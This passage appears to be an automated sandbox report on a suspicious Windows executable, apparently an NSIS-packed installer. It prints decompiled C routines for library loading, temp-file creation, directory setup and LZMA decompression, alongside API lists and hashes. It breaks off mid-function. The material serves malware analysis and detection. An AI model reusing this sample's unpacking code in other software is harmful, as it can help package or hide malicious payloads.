							 *_t33( *((intOrPtr*)(_t34 - 8)), 0x400, 0x425000, 0x40b860, "�GB"); // executed
						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x20)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x1c)) == _t27 && E004039DB(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                                              0x0040209d
                                                              0x0040209d
                                                              0x004020a2
                                                              0x004020a9
                                                              0x00402164
                                                              0x004022dd
                                                              0x004022dd
                                                              0x00402a5a
                                                              0x00402a5d
                                                              0x00402a69
                                                              0x00402a69
                                                              0x004020b8
                                                              0x004020c2
                                                              0x004020c5
                                                              0x004020d4
                                                              0x004020d8
                                                              0x004020de
                                                              0x004020e2
                                                              0x0040215d
                                                              0x00000000
                                                              0x0040215d
                                                              0x004020e4
                                                              0x004020ed
                                                              0x004020f1
                                                              0x00402135
                                                              0x004020f3
                                                              0x004020f6
                                                              0x004020f9
                                                              0x00402129
                                                              0x004020fb
                                                              0x004020fe
                                                              0x00402107
                                                              0x00402109
                                                              0x00402109
                                                              0x00402107
                                                              0x004020f9
                                                              0x0040213d
                                                              0x00402152
                                                              0x00402152
                                                              0x00000000
                                                              0x0040213d
                                                              0x004020c8
                                                              0x004020ce
                                                              0x004020d2
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000

                                                              APIs
                                                              • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 004020C8
                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
                                                                • Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
                                                                • Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
                                                                • Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053E3
                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 004053FD
                                                                • Part of subcall function 0040534F: SendMessageA.USER32 ref: 0040540B
                                                              • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 004020D8
                                                              • GetProcAddress.KERNEL32(00000000,?,?,00000008,00000001,000000F0), ref: 004020E8
                                                              • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,00000000,?,?,00000008,00000001,000000F0), ref: 00402152
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                                              • String ID: GB
                                                              • API String ID: 2987980305-3285937634
                                                              • Opcode ID: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                                                              • Instruction ID: 9b57ca00f45afa7d873c5e4c93812c2e033b3b55bd6b5381131ee912067d0413
                                                              • Opcode Fuzzy Hash: 621d8ec26b05587c79b2cea071fc8b0623d7a7a062788e3185bb13ecc113f1ec
                                                              • Instruction Fuzzy Hash: EA212E32600125EBCF207FA48F49B5F76B0AF50358F20423BF211B62D0CBBC49829A5D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00405DF0, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 100%
                                                              			E00405DF0(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3ec; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                              0x00405df4
                                                              0x00405dfa
                                                              0x00405dfb
                                                              0x00405dfb
                                                              0x00405e00
                                                              0x00405e01
                                                              0x00405e04
                                                              0x00405e0e
                                                              0x00405e1b
                                                              0x00405e1e
                                                              0x00405e26
                                                              0x00000000
                                                              0x00000000
                                                              0x00405e2a
                                                              0x00000000
                                                              0x00000000
                                                              0x00405e2c
                                                              0x00000000
                                                              0x00405e2c
                                                              0x00000000

                                                              APIs
                                                              • GetTickCount.KERNEL32(76712754,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\AppData\Roaming\propser16364.exe",0040345F,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405E04
                                                              • GetTempFileNameA.KERNEL32(?,?,00000000,?), ref: 00405E1E
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp\, xrefs: 00405DF3
                                                              • "C:\Users\user\AppData\Roaming\propser16364.exe", xrefs: 00405DF0
                                                              • nsa, xrefs: 00405DFB
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CountFileNameTempTick
                                                              • String ID: "C:\Users\user\AppData\Roaming\propser16364.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                              • API String ID: 1716503409-1478590567
                                                              • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                              • Instruction ID: dc9f33b0ddeab6bc99614e691558c60e13527be9603daad3520fecf5624fafc7
                                                              • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                              • Instruction Fuzzy Hash: CAF0A7363042087BDB118F59EC45BDB7B9DDF91750F14C03BFA88DA280D6B0D9988798
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 004015BB, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 87%
                                                              			E004015BB(char __ebx, void* __eflags) {
				void* _t13;
				int _t19;
				char _t21;
				void* _t22;
				char _t23;
				signed char _t24;
				char _t26;
				CHAR* _t28;
				char* _t32;
				void* _t33;

				_t26 = __ebx;
				_t28 = E00402BCE(0xfffffff0);
				_t13 = E00405C59(_t28);
				_t30 = _t13;
				if(_t13 != __ebx) {
					do {
						_t32 = E00405BEB(_t30, 0x5c);
						_t21 =  *_t32;
						 *_t32 = _t26;
						 *((char*)(_t33 + 0xb)) = _t21;
						if(_t21 != _t26) {
							L5:
							_t22 = E00405892(_t28);
						} else {
							_t39 =  *((intOrPtr*)(_t33 - 0x20)) - _t26;
							if( *((intOrPtr*)(_t33 - 0x20)) == _t26 || E004058AF(_t39) == 0) {
								goto L5;
							} else {
								_t22 = E00405815(_t28); // executed
							}
						}
						if(_t22 != _t26) {
							if(_t22 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
							} else {
								_t24 = GetFileAttributesA(_t28); // executed
								if((_t24 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						_t23 =  *((intOrPtr*)(_t33 + 0xb));
						 *_t32 = _t23;
						_t30 = _t32 + 1;
					} while (_t23 != _t26);
				}
				if( *((intOrPtr*)(_t33 - 0x24)) == _t26) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E00406228("C:\\Users\\Albus\\AppData\\Local\\Temp", _t28);
					_t19 = SetCurrentDirectoryA(_t28); // executed
					if(_t19 == 0) {
						 *((intOrPtr*)(_t33 - 4)) =  *((intOrPtr*)(_t33 - 4)) + 1;
					}
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t33 - 4));
				return 0;
			}













                                                              0x004015bb
                                                              0x004015c2
                                                              0x004015c5
                                                              0x004015ca
                                                              0x004015ce
                                                              0x004015d0
                                                              0x004015d8
                                                              0x004015da
                                                              0x004015dc
                                                              0x004015e0
                                                              0x004015e3
                                                              0x004015fb
                                                              0x004015fc
                                                              0x004015e5
                                                              0x004015e5
                                                              0x004015e8
                                                              0x00000000
                                                              0x004015f3
                                                              0x004015f4
                                                              0x004015f4
                                                              0x004015e8
                                                              0x00401603
                                                              0x0040160a
                                                              0x00401617
                                                              0x00401617
                                                              0x0040160c
                                                              0x0040160d
                                                              0x00401615
                                                              0x00000000
                                                              0x00000000
                                                              0x00401615
                                                              0x0040160a
                                                              0x0040161a
                                                              0x0040161d
                                                              0x0040161f
                                                              0x00401620
                                                              0x004015d0
                                                              0x00401627
                                                              0x00401652
                                                              0x004022dd
                                                              0x00401629
                                                              0x0040162b
                                                              0x00401636
                                                              0x0040163c
                                                              0x00401644
                                                              0x0040164a
                                                              0x0040164a
                                                              0x00401644
                                                              0x00402a5d
                                                              0x00402a69

                                                              APIs
                                                                • Part of subcall function 00405C59: CharNextA.USER32(?), ref: 00405C67
                                                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C6C
                                                                • Part of subcall function 00405C59: CharNextA.USER32(00000000), ref: 00405C80
                                                              • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                • Part of subcall function 00405815: CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405858
                                                              • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Local\Temp,00000000,00000000,000000F0), ref: 0040163C
                                                              Strings
                                                              • C:\Users\user\AppData\Local\Temp, xrefs: 00401631
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2090822381.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000004.00000002.2090816328.0000000000400000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090831493.0000000000408000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090838235.000000000040A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090847346.0000000000413000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090864640.0000000000422000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090871003.000000000042A000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000004.00000002.2090878038.000000000042D000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                              • API String ID: 1892508949-2935972921
                                                              • Opcode ID: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                                                              • Instruction ID: 7f8751d3726a152fc7b031c4469f223aff892055c158b12f401dbf96511dfde3
                                                              • Opcode Fuzzy Hash: 81892e281e0bc41ed8071f99871bb6b4c6bb310ff5ad2bafd743c978d2f7bd36
                                                              • Instruction Fuzzy Hash: EC112B31208151EBDB307FA54D409BF37B0DA92714B28467FE592B22D3D63D4943962E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00406D5A, Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 99%
                                                              			E00406D5A() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M004071C8))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
